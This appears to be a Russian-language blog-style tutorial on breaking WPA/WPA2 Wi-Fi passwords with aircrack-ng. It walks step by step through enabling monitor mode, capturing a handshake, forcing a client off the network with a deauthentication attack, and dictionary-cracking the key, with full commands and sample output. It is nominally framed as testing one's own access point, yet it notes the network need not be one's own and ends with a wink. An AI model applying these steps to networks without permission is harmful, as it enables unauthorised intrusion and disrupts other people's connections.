D этой статье мы попробуем "проверить на безопасность" свою собственную беспроводную точку (Можно не свою)доступа в интернет. И так, приступим... Шаг 1 - запуск беспроводного интерфейса в режиме мониторинга Цель этого шага в том, чтобы запустить вашу wi-fi карту в так называемом режиме мониторинга. Данный режим позволяет вам «слушать» все пакеты, т. е. Не только те которые адресованы вашей карте. Точная процедура включения режима монитора отличается в зависимости от используемого драйвера. Для определения драйвера, выполните следующую команду: airmon-ng На машине с Ralink, Atheros и Broadcom система выдаст примерно следующее: Interface Chipset Driver rausb0 Ralink RT73 rt73 wlan0 Broadcom b43 - [phy0] wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) Шаг 1а - Настройка MadWifi -NG Сперва остановим ath0, выполнив: airmon-ng stop ath0 Должно быть так: Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed) Выполните команду "iwconfig", чтобы убедиться в том, что больше никаких интерфейсов athX не запущено. Это должно выглядеть примерно так: lo no wireless extensions. eth0 no wireless extensions. wifi0 no wireless extensions. Теперь введите следующую команду, чтобы переключить беспроводную карту на канал 9 в режиме мониторинга: airmon-ng start wifi0 9 После этой команды мы должны увидеть что-то похожее на: Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled) Теперь убедимся что наш интерфейс правильно настроен, снова выполняем команду iwconfig Ответ должен выглядеть так: lo no wireless extensions. wifi0 no wireless extensions. eth0 no wireless extensions. ath0 IEEE 802.11g ESSID:"" Nickname:"" Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 Шаг 1b - Настройка драйверов mac80211 airmon-ng start wlan0 9 Interface Chipset Driver wlan0 Broadcom b43 - [phy0] (monitor mode enabled on mon0) Обратите внимание, что монитор включен на mon0. Стадия 1С — Настройка прочих драйверов Для других ( ieee80211 основе ) драйверов, просто выполните следующую команду, чтобы включить режим мониторинга (замените rausb0 вашим именем интерфейса): airmon-ng start rausb0 9 Результат Interface Chipset Driver rausb0 Ralink rt73 (monitor mode enabled) Шаг 2 — Начало. Сбор хэндшейков. Целью этого шага является сбор т. н. рукопожатий Выполняем: airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0 Где: · -с 9 является каналом для беспроводной сети · - BSSID 00:14:6 C: 7E : 40:80 является MAC адресом точки доступа. · -w psk является префиксом имени файла вывода · ath0 является именем нашего интерфейса. Вот какой будет вывод если беспроводной клиент подключится к сети: CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy BSSID STATION PWR Lost Packets Probes 00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116 А вот так если не подключится: CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy BSSID STATION PWR Lost Packets Probes Данный шаг может затянуться, и вам придется ждать пока кто-то из клиентов не подключится к точке доступа. Но думаю это не проблема. На основании вывода Airodump-ng в предыдущем шаге, вам удалось определить клиента, который в данный момент подключен. Нам понадобится его MAC-адрес. Откройте другой сеанс консоли и введите: aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0 Где: · -0 средство деаутентификации · 1 число деаутентификаций для отправки ( вы можете отправить несколько , если хотите) · -a 00:14:6C:7E:40:80 МАС-адрес точки доступа · -c 00:0F:B5:FD:FB:C2 МАС-адрес клиента которого мы обнаружили · ath0 имя интерфейса Вот как будет выглядеть результат команды: 11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30] Шаг 4 — Aircrack-ng - взлом предварительного ключа На данном этапе нам нужно взломать предварительный ключ WPA/WPA2. Чтобы сделать это, нам понадобиться словарь слов в качестве входных данных. Существует небольшой словарь, который поставляется с aircrack-ng - “password.lst”. Будем использовать его. Откройте другой сеанс консоли и введите: aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap Где: -w password.lst это имя файла словаря *.cap название группы файлов, содержащих перехваченные пакеты . Обратите внимание, что в данном случае мы использовали специальный символ *, чтобы включить несколько файлов. Вот типичный вывод, когда нет хэндшейков: Opening psk-01.cap Opening psk-02.cap Opening psk-03.cap Opening psk-04.cap Read 1827 packets. No valid WPA handshakes found. Когда это происходит, вы должны либо повторить шаг 3 или ждать дольше, если вы используете пассивный подход. Вот таким может быть вывод если хэндшейк будет найден: Opening psk-01.cap Opening psk-02.cap Opening psk-03.cap Opening psk-04.cap Read 1827 packets. # BSSID ESSID Encryption 1 00:14:6C:7E:40:80 teddy WPA (1 handshake) Choosing first network as target. Теперь в этот момент, Aircrack-ng начнет пытаться взломать предварительный ключ. В зависимости от скорости вашего процессора и размера словаря, это может занять много времени. Вот таким будет вывод при успешном взломе: Aircrack-ng 0.8 [00:00:00] 2 keys tested (37.20 k/s) KEY FOUND! [ 12345678 ] Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71 EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB Ну вот, ключ у нас. Беспроводная сеть проверена на безопасность ;)